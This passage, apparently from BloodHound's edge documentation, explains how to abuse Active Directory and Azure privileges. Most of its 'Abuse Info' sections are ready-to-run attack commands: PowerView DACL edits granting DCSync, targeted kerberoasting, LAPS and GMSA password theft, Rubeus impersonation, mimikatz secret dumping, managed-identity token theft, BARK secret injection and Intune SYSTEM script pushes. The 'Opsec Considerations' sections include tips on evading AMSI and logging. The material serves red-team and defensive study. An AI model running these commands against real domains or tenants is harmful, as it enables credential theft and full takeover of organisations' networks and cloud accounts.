See the abuse info for ForceChangePassword and GenericAll over a user for more infromation about how to continue from there.


With WriteDACL over a computer object, grant yourself full control of the computer object:

Add-DomainObjectAcl -TargetIdentity windows1 -Rights All

Then either read the LAPS password attribute for the computer or perform resource-based constrained delegation against the target computer.


With WriteDACL against a domain object, grant yourself the ability to DCSync:

Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSync

Then perform the DCSync attack.


With WriteDACL over a GPO, grant yourself full control of the GPO:

Add-DomainObjectAcl -TargetIdentity TestGPO -Rights All

Then edit the GPO to take over an object the GPO applies to.


With WriteDACL over an OU, grant yourself full control of the OU:

Add-DomainObjectAcl -TargetIdentity (OU GUID) -Rights All

Then add a new ACE to the OU that inherits down to child objects to take over those child objects.

Opsec Considerations

When using the PowerView functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what’s going on with PowerShell in their network, such as script block logging and AMSI. You can bypass those security mechanisms by downgrading to PowerShell v2, which all PowerView functions support.

Modifying permissions on an object will generate 4670 and 4662 events on the domain controller that handled the request.

Additional opsec considerations depend on the target object and how to take advantage of this privilege.


Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user

Abuse Info


With GenericWrite over a user, perform a targeted kerberoasting attack. See the abuse section under the GenericAll edge for more information


With GenericWrite over a group, add yourself or another principal you control to the group. See the abuse info under the AddMembers edge for more information


With GenericWrite over a computer, perform resource-based constrained delegation against the computer. See the GenericAll edge abuse info for more information about that attack.


With GenericWrite on a GPO, you may make modifications to that GPO which will then apply to the users and computers affected by the GPO. Select the target object you wish to push an evil policy down to, then use the gpedit GUI to modify the GPO, using an evil policy that allows item-level targeting, such as a new immediate scheduled task. Then wait for the group policy client to pick up and execute the new evil policy. See the references tab for a more detailed write up on this abuse.

This edge can be a false positive in rare scenarios. If you have GenericWrite on the GPO with ‘This object only’ (no inheritance) and no other permissions in the ACL, it is not possible to add or modify settings of the GPO. The GPO’s settings are stored in SYSVOL under a folder for the given GPO. Therefore, you need write access to child objects of this folder or create child objects permission. The security descriptor of the GPO is reflected on the folder, meaning permissions to write child items on the GPO are required.

Opsec Considerations

This will depend on which type of object you are targetting and the attack you perform. See the relevant edge for opsec considerations for the actual attack you perform.


Object owners retain the ability to modify object security descriptors, regardless of permissions on the object’s DACL.

This clip shows an example of abusing this edge:

Abuse Info

To change the ownership of the object, you may use the Set-DomainObjectOwner function in PowerView.

To abuse this privilege with PowerView’s Set-DomainObjectOwner, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as the user with the password reset privilege if you are not running a process as that user.

To do this in conjunction with Set-DomainObjectOwner, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Set-DomainObjectOwner, optionally specifying $Cred if you are not already running a process as the user with this privilege:

Set-DomainObjectOwner -Credential $Cred -TargetIdentity "Domain Admins" -OwnerIdentity harmj0y

Now, with ownership of the object, you may modify the DACL of the object however you wish. For more information about that, see the WriteDacl edge section.

Opsec Considerations

This depends on the target object and how to take advantage of this privilege.

When using the PowerView functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what’s going on with PowerShell in their network, such as script block logging and AMSI. You can bypass those security mechanisms by downgrading to PowerShell v2, which all PowerView functions support.

Modifying permissions on an object will generate 4670 and 4662 events on the domain controller that handled the request.


The ability to write directly to the servicePrincipalNames attribute on a user object. Writing to this property gives you the opportunity to perform a targeted kerberoasting attack against that user.

Abuse Info

A targeted kerberoast attack can be performed using PowerView’s Set-DomainObject along with Get-DomainSPNTicket.

You may need to authenticate to the Domain Controller as the user with full control over the target user if you are not running a process as that user. To do this in conjunction with Set-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Set-DomainObject, optionally specifying $Cred if you are not already running a process as the user with full control over the target user.

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

After running this, you can use Get-DomainSPNTicket as follows:

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

The recovered hash can be cracked offline using the tool of your choice. Cleanup of the ServicePrincipalName can be done with the Set-DomainObject command:

Set-DomainObject -Credential $Cred -Identity harmj0y -Clear serviceprincipalname

Opsec Considerations

Modifying the servicePrincipalName attribute will not, by default, generate an event on the Domain Controller. Your target may have configured logging on users to generate 5136 events whenever a directory service is modified, but this configuration is very rare.


Object owners retain the ability to modify object security descriptors, regardless of permissions on the object’s DACL

This clip shows an example of abusing object ownership:

Abuse Info

With ownership of the object, you may modify the DACL of the object however you wish. For more information about that, see the WriteDacl edge section.

Opsec Considerations

This depends on the target object and how to take advantage of this privilege.

When using the PowerView functions, keep in mind that PowerShell v5 introduced several security mechanisms that make it much easier for defenders to see what’s going on with PowerShell in their network, such as script block logging and AMSI. You can bypass those security mechanisms by downgrading to PowerShell v2, which all PowerView functions support.

Modifying permissions on an object will generate 4670 and 4662 events on the domain controller that handled the request.


This privilege allows you to read the LAPS password from a computer

Abuse Info

You may need to authenticate to the Domain Controller as the user with full control over the target user if you are not running a process as that user. To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)

Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as the user with full control over the target user.

Get-DomainObject -Credential $Cred -Identity windows10 -Properties "ms-mcs-AdmPwd",name

Opsec Considerations

Reading properties from LDAP is extremely low risk, and can only be found using monitoring of LDAP queries.


This privilege allows you to read the password for a Group Managed Service Account (GMSA). Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).

The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.`;

Abuse Info

There are several ways to abuse the ability to read the GMSA password. The most straight forward abuse is possible when the GMSA is currently logged on to a computer, which is the intended behavior for a GMSA.

If the GMSA is logged on to the computer account which is granted the ability to retrieve the GMSA’s password, simply steal the token from the process running as the GMSA, or inject into that process.

If the GMSA is not logged onto the computer, you may create a scheduled task or service set to run as the GMSA. The computer account will start the sheduled task or service as the GMSA, and then you may abuse the GMSA logon in the same fashion you would a standard user running processes on the machine (see the “HasSession” help modal for more details). Finally, it is possible to remotely retrieve the password for the GMSA and convert that password to its equivalent NT hash, then perform overpass-the-hash to retrieve a Kerberos ticket for the GMSA:

  1. Build GMSAPasswordReader.exe from its source:
  2. Drop GMSAPasswordReader.exe to disk. If using Cobalt Strike, load and run this binary using execute-assembly

3. Use GMSAPasswordReader.exe to retrieve the NT hash for the GMSA. You may have more than one NT hash come back, one for the “old” password and one for the “current” password. It is possible that either value is valid:

gmsapasswordreader.exe --accountname gmsa-jkohler

At this point you are ready to use the NT hash the same way you would with a regular user account. You can perform pass-the-hash, overpass-the-hash, or any other technique that takes an NT hash as an input.

Opsec Considerations

When abusing a GMSA that is already logged onto a system, you will have the same opsec considerations as when abusing a standard user logon. For more information about that, see the “HasSession” modal’s opsec considerations tab.

When retrieving the GMSA password from Active Directory, you may generate a 4662 event on the Domain Controller; however, that event will likely perfectly resemble a legitimate event if you request the password from the same context as a computer account that is already authorized to read the GMSA password.


GPOs linked to a container apply to all objects that are contained by the container. Additionally, ACEs set on a parent OU may inherit down to child objects.

Abuse Info

With control of an OU, you may add a new ACE on the OU that will inherit down to the objects under that OU. Below are two options depending on how targeted you choose to be in this step:

Generic Descendent Object Takeover:

The simplest and most straight forward way to abuse control of the OU is to apply a GenericAll ACE on the OU that will inherit down to all object types. Again, this can be done using PowerView. This time we will use the New-ADObjectAccessControlEntry, which gives us more control over the ACE we add to the OU.

First, we need to reference the OU by its ObjectGUID, not its name. You can find the ObjectGUID for the OU in the BloodHound GUI by clicking the OU, then inspecting the objectid value

Next, we will fetch the GUID for all objects. This should be ‘00000000-0000-0000-0000-000000000000’:

$Guids = Get-DomainGUIDMap
$AllObjectsPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'All'} | select -ExpandProperty name

Then we will construct our ACE. This command will create an ACE granting the “JKHOLER” user full control of all descendant objects:

ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity 'JKOHLER' -Right GenericAll -AccessControlType Allow -InheritanceType All -InheritedObjectType $AllObjectsPropertyGuid

Finally, we will apply this ACE to our target OU:

$OU = Get-DomainOU -Raw (OU GUID)
$DsEntry = $OU.GetDirectoryEntry()
$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'

Now, the “JKOHLER” user will have full control of all descendent objects of each type.

Targeted Descendent Object Takeoever:

If you want to be more targeted with your approach, it is possible to specify precisely what right you want to apply to precisely which kinds of descendent objects. You could, for example, grant a user “ForceChangePassword” privilege against all user objects, or grant a security group the ability to read every GMSA password under a certain OU. Below is an example taken from PowerView’s help text on how to grant the “ITADMIN” user the ability to read the LAPS password from all computer objects in the “Workstations” OU:

$Guids = Get-DomainGUIDMap
$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name
$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name
$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid
$OU = Get-DomainOU -Raw Workstations
$DsEntry = $OU.GetDirectoryEntry()
$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'

Opsec Considerations


Extended rights are special rights granted on objects which allow reading of privileged attributes, as well as performing special actions.

Abuse Info


Having this privilege over a user grants the ability to reset the user’s password. For more information about that, see the ForceChangePassword edge section


You may perform resource-based constrained delegation with this privilege over a computer object. For more information about that, see the GenericAll edge section.

Domain The AllExtendedRights privilege grants both the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges, which combined allow a principal to replicate objects from the domain. This can be abused using the lsadump::dcsync command in mimikatz.

Opsec Considerations

This will depend on the actual attack performed. See the particular opsec considerations sections for the ForceChangePassword, AddMembers, and GenericAll edges for more info


An attacker can use this account to execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user to the target computer system and receive a valid service ticket “as” this user.

One caveat is that impersonated users can not be in the “Protected Users” security group or otherwise have delegation privileges revoked. Another caveat is that the principal added to the msDS-AllowedToActOnBehalfOfOtherIdentity DACL must have a service principal name (SPN) set in order to successfully abuse the S4U2self/S4U2proxy process. If an attacker does not currently control an account with a SPN set, an attacker can abuse the default domain MachineAccountQuota settings to add a computer account that the attacker controls via the Powermad project.

This clip demonstrates how to abuse this edge:

Abuse Info

Abusing this primitive is currently only possible through the Rubeus project.

To use this attack, the controlled account MUST have a service principal name set, along with access to either the plaintext or the RC4_HMAC hash of the account.

If the plaintext password is available, you can hash it to the RC4_HMAC version using Rubeus:

Rubeus.exe hash /password:Summer2018!

Use Rubeus’ s4u module to get a service ticket for the service name (sname) we want to “pretend” to be “admin” for. This ticket is injected (thanks to /ptt), and in this case grants us access to the file system of the TARGETCOMPUTER:

Rubeus.exe s4u /user:<trusted user> /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt

Opsec Considerations

To execute this attack, the Rubeus C# assembly needs to be executed on some system with the ability to send/receive traffic in the domain.


The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object.

This clip demonstrates how to abuse this edge:

Abuse Info

See the AllowedToAct edge section for abuse info

Opsec Considerations

See the AllowedToAct edge section for opsec considerations


This edge indicates the principal has the ability to write to modify several properties on the target principal, most notably the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation to compromise the remote computer system. This property is a binary DACL that controls what security principals can pretend to be any domain user to the particular computer object.

This clip demonstrates how to abuse this edge:

Abuse Info

See the AllowedToAct edge section for abuse info

Opsec Considerations

See the AllowedToAct edge section for opsec considerations


This edge is used to keep track of domain trusts, and maps to the direction of access.

Abuse Info

This edge will come in handy when analzying how to jump a forest trust to get enterprise admin access from domain admin access within a forest. For more information about that attack, see


A principal with this signifies the capability of retrieving, through a directory synchronization, the value of confidential and RODC filtered attributes, such as LAPS’ ms-Mcs-AdmPwd.

Abuse Info

To abuse these privileges, use DirSync:

Sync-LAPS -LDAPFilter '(samaccountname=TargetComputer$)'

For other optional parameters, view the DirSync documentation.

Opsec Considerations

Executing the attack will generate a 4662 (An operation was performed on an object) event at the domain controller if an appropriate SACL is in place on the target object.


A computer with this indicates that a Standalone Managed Service Account (sMSA) is installed on it. An actor with administrative privileges on the computer can retrieve the sMSA’s password by dumping LSA secrets.

Abuse Info

From an elevated command prompt on the computer where the sMSA resides, run mimikatz then execute the following commands:


In the output, find _SC_{262E99C9-6160-4871-ACEC-4E61736B6F21}_ suffixed by the name of the targeted sMSA. The next line contains cur/hex : followed with the sMSA’s password hex-encoded.

To use this password, its NT hash must be calculated. This can be done using a small python script:

import sys, hashlib

pw_hex = sys.argv[1]
nt_hash ='md4', bytes.fromhex(pw_hex)).hexdigest()


Execute it like so:

python3 35f3e1713d61...

To authenticate as the sMSA, leverage pass-the-hash.

Alternatively, to avoid executing mimikatz on the host, you can save a copy of the SYSTEM and SECURITY registry hives from an elevated prompt:

reg save HKLM\SYSTEM %temp%\SYSTEM & reg save HKLM\SECURITY %temp%\SECURITY

Transfer the files named SYSTEM and SECURITY that were saved at %temp% to another computer where mimikatz can be safely executed.

On this other computer, run mimikatz from a command prompt then execute the following command to obtain the hex-encoded password:

lsadump::secrets /system:C:\path\to\file\SYSTEM /security:C:\path\to\file\SECURITY

Opsec Considerations

Access to registry hives can be monitored and alerted via event ID 4656 (A handle to an object was requested).


The ability to add other principals to an Azure security group

Abuse Info

Via the Azure portal: 1. Find the group in your tenant (Azure Active Directory -> Groups -> Find Group in list) 2. Click the group from the list 3. In the left pane, click “Members” 4. At the top, click “Add members” 5. Find the principals you want to add to the group and click them, then click “select” at the bottom 6. You should see a message in the top right saying “Member successfully added”

Via PowerZure: Add-AzureADGroup -User [UPN] -Group [Group name]

Opsec Considerations

The Azure activity log for the tenant will log who added what principal to what group, including the date and time.


This edge is created during post-processing. It is created against all App Registrations and Service Principals within the same tenant when an Azure principal has one of the following Azure Active Directory roles:

  • Hybrid Identity Administrator
  • Partner Tier1 Support
  • Partner Tier2 Support
  • Directory Synchronization Accounts

You will not see these privileges when auditing permissions against any of the mentioned objects when you use Microsoft tooling, including the Azure portal or any API.

Abuse Info

You can use BARK to add a new owner to the target object. The BARK function you use will depend on the target object type, but all of the functions follow a similar syntax.

These functions require you to supply an MS Graph-scoped JWT associated with the principal that has the privilege to add a new owner to your target object. There are several ways to acquire a JWT. For example, you may use BARK’s Get-GraphTokenWithRefreshToken to acquire an MS Graph-scoped JWT by supplying a refresh token:

$MGToken = Get-GraphTokenWithRefreshToken `
    -RefreshToken "0.ARwA6WgJJ9X2qk..." `
    -TenantID ""

To add a new owner to a Service Principal, use BARK’s New-ServicePrincipalOwner function:

New-ServicePrincipalOwner `
    -ServicePrincipalObjectId "082cf9b3-24e2-427b-bcde-88ffdccb5fad" `
    -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `
    -Token $Token

To add a new owner to an App Registration, use BARK’s New-AppOwner function:

New-AppOwner `
    -AppObjectId "52114a0d-fa5b-4ee5-9a29-2ba048d46eee" `
    -NewOwnerObjectId "cea271c4-7b01-4f57-932d-99d752bbbc60" `
    -Token $Token

Opsec Considerations

Any time you add an owner to any Azure object, the AzureAD audit logs will create an event logging who added an owner to what object, as well as what the new owner added to the object was.


Azure provides several systems and mechanisms for granting control of securable objects within Azure Active Directory, including tenant-scoped admin roles, object-scoped admin roles, explicit object ownership, and API permissions.

When a principal has been granted “Cloud App Admin” or “App Admin” against the tenant, that principal gains the ability to add new secrets to all Service Principals and App Registrations. Additionally, a principal that has been granted “Cloud App Admin” or “App Admin” against, or explicit ownership of a Service Principal or App Registration gains the ability to add secrets to that particular object.

Abuse Info

There are several ways to perform this abuse, depending on what sort of access you have to the credentials of the object that holds this privilege against the target object. If you have an interactive web browser session for the Azure portal, it is as simple as finding the target App in the portal and adding a new secret to the object using the “Certificates & secrets” tab. Service Principals do not have this tab in the Azure portal but you can add secrets to them with the MS Graph API. No matter what kind of control you have, you will be able to perform this abuse by using BARK’s New-AppRegSecret or New-ServicePrincipalSecret functions.

These functions require you to supply an MS Graph-scoped JWT associated with the principal that has the privilege to add a new secret to your target application. There are several ways to acquire a JWT. For example, you may use BARK’s Get-GraphTokenWithRefreshToken to acquire an MS Graph-scoped JWT by supplying a refresh token:

$MGToken = Get-GraphTokenWithRefreshToken -RefreshToken "0.ARwA6WgJJ9X2qk..." -TenantID ""

Then use BARK’s New-AppRegSecret to add a new secret to the target application:

New-AppRegSecret -AppRegObjectID "d878..." -Token $MGToken.access_token

The output will contain the plain-text secret you just created for the target app:

New-AppRegSecret -AppRegObjectID "d878..." -Token $MGToken.access_token

Name              Value
----              -----
AppRegSecretValue odg8Q~...
AppRegAppId       4d31...
AppRegObjectId    d878...

With this plain text secret, you can now acquire tokens as the service principal associated with the app. You can easily do this with BARK’s Get-MSGraphToken function:

PS /Users/andyrobbins> $SPToken = Get-MSGraphToken `
-ClientID "4d31..." `
-ClientSecret "odg8Q~..." `
-TenantName ""

PS /Users/andyrobbins> $SPToken.access_token

Now you can use this JWT to perform actions against any other MS Graph endpoint as the service principal, continuing your attack path with the privileges of that service principal.

Opsec Considerations

When you create a new secret for an App or Service Principal, Azure creates an event called “Update application - Certificates and secrets management”. This event describes who added the secret to which application or service principal.


The Azure Kubernetes Service Contributor role grants full control of the target Azure Kubernetes Service Managed Cluster. This includes the ability to remotely fetch administrator credentials for the cluster as well as the ability to execute arbitrary commands on compute nodes associated with the AKS Managed Cluster.

Abuse Info

You can use BARK’s Invoke-AzureRMAKSRunCommand function to execute commands on compute nodes associated with the target AKS Managed Cluster.

This function requires you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to execute commands on the cluster. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token:

$ARMToken = Get-ARMTokenWithRefreshToken `
    -RefreshToken "0.ARwA6WgJJ9X2qk..." `
    -TenantID ""

Now you can use BARK’s Invoke-AzureRMAKSRunCommand function to execute a command against the target AKS Managed Cluster. For example, to run a simple “whoami” command:

Invoke-AzureRMAKSRunCommand `
    -Token $ARMToken `
    -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `
    -Command "whoami"

If the AKS Cluster or its associated Virtual Machine Scale Sets have managed identity assignments, you can use BARK’s Invoke-AzureRMAKSRunCommand function to retrieve a JWT for the managed identity Service Principal like this:

Invoke-AzureRMAKSRunCommand `
    -Token $ARMToken `
    -TargetAKSId "/subscriptions/f1816681-4df5-4a31-acfa-922401687008/resourcegroups/AKS_ResourceGroup/providers/Microsoft.ContainerService/managedClusters/mykubernetescluster" `
    -Command \'curl -i -H "Metadata: true" ""\'

If successful, the output will include a JWT for the managed identity service principal.

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


Principals with the Application Admin role can control tenant-resident apps.

Abuse Info

Create a new credential for the app, then authenticate to the tenant as the app’s service principal, then abuse whatever privilege it is that the service principal has.

Opsec Considerations

The Azure portal will create a log even whenever a new credential is created for a service principal.


The Azure Automation Contributor role grants full control of the target Azure Automation Account. This includes the ability to execute arbitrary commands on the Automation Account.

Abuse Info

You can use BARK’s New-AzureAutomationAccountRunBook and Get-AzureAutomationAccountRunBookOutput functions to execute arbitrary commands against the target Automation Account.

These functions require you to supply an Azure Resource Manager scoped JWT associated with the principal that has the privilege to add or modify and run Automation Account run books. There are several ways to acquire a JWT. For example, you may use BARK’s Get-ARMTokenWithRefreshToken to acquire an Azure RM-scoped JWT by supplying a refresh token:

$ARMToken = Get-ARMTokenWithRefreshToken `
    -RefreshToken "0.ARwA6WgJJ9X2qk..." `
    -TenantID ""

Now you can use BARK’s New-AzureAutomationAccountRunBook function to add a new runbook to the target Automation Account, specifying a command to execute using the -Script parameter:

New-AzureAutomationAccountRunBook `
    -Token $ARMToken `
    -RunBookName "MyCoolRunBook" `
    -AutomationAccountPath "" `
    -Script "whoami"

After adding the new runbook, you must execute it and fetch its output. You can do this automatically with BARK’s Get-AzureAutomationAccountRunBookOutput function:

Get-AzureAutomationAccountRunBookOutput `
    -Token $ARMToken `
    -RunBookName "MyCoolRunBook" `
    -AutomationAccountPath ""

If the Automation Account has a managed identity assignment, you can use these two functions to retrieve a JWT for the service principal like this:

$Script = $tokenAuthURI = $env:MSI_ENDPOINT + "?resource="; $tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI; $tokenResponse.access_token
New-AzureAutomationAccountRunBook -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath "" -Script $Script
Get-AzureAutomationAccountRunBookOutput -Token $ARMToken -RunBookName "MyCoolRunBook" -AutomationAccountPath ""

If successful, the output will include a JWT for the managed identity service principal.

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


Any principal granted the Avere Contributor role, scoped to the affected VM, can reset the built-in administrator password on the VM.

Abuse Info

The Avere Contributor role allows you to run SYSTEM commands on the VM

Via PowerZure:

Opsec Considerations

Because you’ll be running a command as the SYSTEM user on the Virtual Machine, the same opsec considerations for running malicious commands on any system should be taken into account: command line logging, PowerShell script block logging, EDR, etc.


Principals with the Cloud App Admin role can control tenant-resident apps.

Abuse Info

Create a new credential for the app, then authenticate to the tenant as the app’s service principal, then abuse whatever privilege it is that the service principal has.

Opsec Considerations

The Azure portal will create a log even whenever a new credential is created for a service principal.


This indicates that the parent object contains the child object, such as a resource group containing a virtual machine, or a tenant “containing” a subscription.


The contributor role grants almost all abusable privileges in all circumstances, with some exceptions. Those exceptions are not collected by AzureHound.

Abuse Info

This depends on what the target object is: * Key Vault: You can read secrets and alter access policies (grant yourself access to read secrets) * Automation Account: You can create a new runbook that runs as the Automation Account, and edit existing runbooks. Runbooks can be used to authenticate as the Automation Account and abuse privileges held by the Automation Account. If the Automation Account is using a ‘RunAs’ account, you can gather the certificate used to login and impersonate that account. * Virtual Machine: Run SYSTEM commands on the VM

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


Principals with the Intune Administrators role are able to execute arbitrary PowerShell scripts on devices that are joined to the Azure Active Directory tenant.

Abuse Info

First, have your PowerShell script ready to go and save it somewhere as a PS1 file. Take all the necessary operational security (opsec) and AMSI-bypass steps you want at this point, keeping in mind the script will run as the SYSTEM user unless you specify otherwise. Also keep in mind that the script will be written to disk, so take whatever AV bypass measures you need as well.

Next, log into the Azure web portal as the user with the “Intune Administrator” role activated. After authenticating, access Endpoint Manager at

Click on “Devices” on the left, which takes you, unsurprisingly, to the devices overview. Click on “Scripts” under the “Policy” section to go to the scripts management page. Click “Add,” then click “Windows 10”.

This will bring you to the “Add Powershell Script” page. On this first page, you’ll enter a name for the script and a brief description. On the next page, click the folder and then select your PS1 from the common dialogue window. You’ve now got three options to configure, but can leave them all in the default “No” position. Most interestingly, keeping the first selection as “No” will cause the script to run as the SYSTEM user.

Click next, and you’ll see the page that lets you scope which systems and users this script will execute for. You can choose to assign the script to “All devices,” “All users,” or “All users and devices.” If you leave the “Assign to” dropdown at its default selection of “Selected groups,” you can scope the script to only execute on systems or for users that belong to certain security groups. The choice is yours: run the script on every possible system or constrain it to only run on certain systems by scoping it to existing security groups or by adding specific devices or users to new security groups.

Click “Next” and you’ll see the review page which lets you see what you’re about to do. Click “Add” and Azure will begin registering the script. At this point, the script is now ready to run on your target systems. This process works similarly to Group Policy, in that the Intune agent running on each device periodically checks in (by default every hour) with Intune/Endpoint Manager to see if there is a PowerShell script for it to run, so you will need to wait up to an hour for your target system to actually pull the script down and run it.

Opsec Considerations

When the Intune agent pulls down and executes PowerShell scripts, a number of artifacts are created on the endpoint - some permanent and some ephemeral.

Two files are created on the endpoint when a PowerShell script is executed in the following locations:

C:\Program files (x86)\Microsoft Intune Management Extension\Policies\Scripts
C:\Program files (x86)\Microsoft Intune Management Extension\Policies\Results

The file under the “Scripts” folder will be a local copy of the PS1 stored in Azure, and the file under the “Results” folder will be the output of the PS1; however, both of these files are automatically deleted as soon as the script finishes running. There are also permanent artifacts left over (assuming the attacker doesn’t tamper with them). A full copy of the contents of the PS1 can be found in this log file:



The ability to read certificates from key vaults.

Abuse Info

Use PowerShell or PowerZure to fetch the certificate from the key vault.

Via PowerZure:

  • Get-AzureKeyVaultContent
  • Export-AzureKeyVaultcontent

Opsec Considerations

Azure will create a new log event for the key vault whenever a secret is accessed.


The ability to read keys from key vaults.

Abuse Info

Use PowerShell or PowerZure to fetch the certificate from the key vault.

Via PowerZure:

  • Get-AzureKeyVaultContent
  • Export-AzureKeyVaultcontent

Opsec Considerations

Azure will create a new log event for the key vault whenever a secret is accessed.


The ability to read secrets from key vaults.

Abuse Info

Use PowerShell or PowerZure to fetch the certificate from the key vault.

Via PowerZure:

  • Get-AzureKeyVaultContent
  • Export-AzureKeyVaultcontent

Opsec Considerations

Azure will create a new log event for the key vault whenever a secret is accessed.


This edge indicates the principal has the Global Admin role active against the target tenant. In other words, the principal is a Global Admin. Global Admins can do almost anything against almost every object type in the tenant, this is the highest privilege role in Azure.

Abuse Info

As a Global Admin, you can change passwords, run commands on VMs, read key vault secrets, activate roles for other users, etc.

For Global Admin to be able to abuse Azure resources, you must first grant yourself the ‘User Access Administrator’ role in Azure RBAC. This is done through a toggle button in the portal, or via the PowerZure function Set-AzureElevatedPrivileges.

Once that role is applied to account, you can then add yourself as an Owner to all subscriptions in the tenant

Opsec Considerations

This depends on exactly what you do, but in general Azure will log each abuse action.


This edge indicates that a principal has been granted a particular AzureAD admin role.

Abuse Info

No abuse is necessary. This edge only indicates that the principal has been granted a particular AzureAD admin role.

Opsec Considerations

The opsec considerations for a particular action authorized by a principal&ldquo;s active AzureAD role assignment will wholly depend on what the action taken is. This edge does not capture all abusable possibilities.


The Key Vault Contributor role grants full control of the target Key Vault. This includes the ability to read all secrets stored on the Key Vault.

Abuse Info

You can read secrets and alter access policies (grant yourself access to read secrets)

Via PowerZure:

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


The Logic Contributor role grants full control of the target Logic App. This includes the ability to execute arbitrary commands on the Logic App.

Abuse Info

Currently you need access to the portal GUI to execute this abuse. The abuse involves adding or modifying an existing logic app to coerce the logic app into sending a JWT for its managed identity service principal to a web server you control.

You can see a full walkthrough for executing that abuse in this blog post: Andy Robbins - Managed Identity Attack Paths, Part 2: Logic Apps

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


Azure resources like Virtual Machines, Logic Apps, and Automation Accounts can be assigned to either System- or User-Assigned Managed Identities. This assignment allows the Azure resource to authenticate to Azure services as the Managed Identity without needing to know the credential for that Managed Identity. Managed Identities, whether System- or User-Assigned, are AzureAD Service Principals.

Abuse Info

You can modify the Azure RM resource to execute actions against Azure with the privileges of the Managed Identity Service Principal.

It is also possible to extract a JSON Web Token (JWT) for the Service Principal, then use that JWT to authenticate as the Service Principal outside the scope of the Azure RM resource. Here is how you extract the JWT using PowerShell:

$tokenAuthURI = $env:MSI_ENDPOINT + "?resource="
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"Secret"="$env:MSI_SECRET"} -Uri $tokenAuthURI

We can then use this JWT to authenticate as the Service Principal to the Microsoft Graph APIs using BARK for example.

Opsec Considerations

This will depend on which particular abuse you perform, but in general Azure will create a log event for each abuse.


The given asset is a member of the group.

Groups in Azure Active Directory grant their direct members any privileges the group itself has. If a group has an AzureAD admin role, direct members of the group inherit those permissions.

Abuse Info

No abuse is necessary. This edge simply indicates that a principal belongs to a security group.

Opsec Considerations

No opsec considerations apply to this edge.


This edge is created during post-processing. It is created against non role assignable Azure AD security groups when a Service Principal has one of the following MS Graph app role assignments:

  • Directory.ReadWrite.All
  • Group.ReadWrite.All
  • GroupMember.ReadWrite.All

It is created against all Azure AD security groups, including those that are role assignable, when a Service Principal has the following MS Graph app role:

  • RoleManagement.ReadWrite.Directory

You will not see this privilege when using just the Azure portal or any other Microsoft tooling. If you audit the roles and administrators affecting any particular Azure security group, you will not see that the Service Principal can add members to the group, but it indeed can because of the parallel access management system used by MS Graph.

Abuse Info

You can abuse this privilege using BARK’s Add-AZMemberToGroup function.

This function requires you to supply an MS Graph-scoped JWT associated with the Service Principal that has the privilege to add principal to the target group. There are several ways to acquire a JWT. For example, you may use BARK’s Get-MSGraphTokenWithClientCredentials to acquire an MS Graph-scoped JWT by supplying a Service Principal Client ID and secret:

$MGToken = Get-MSGraphTokenWithClientCredentials `
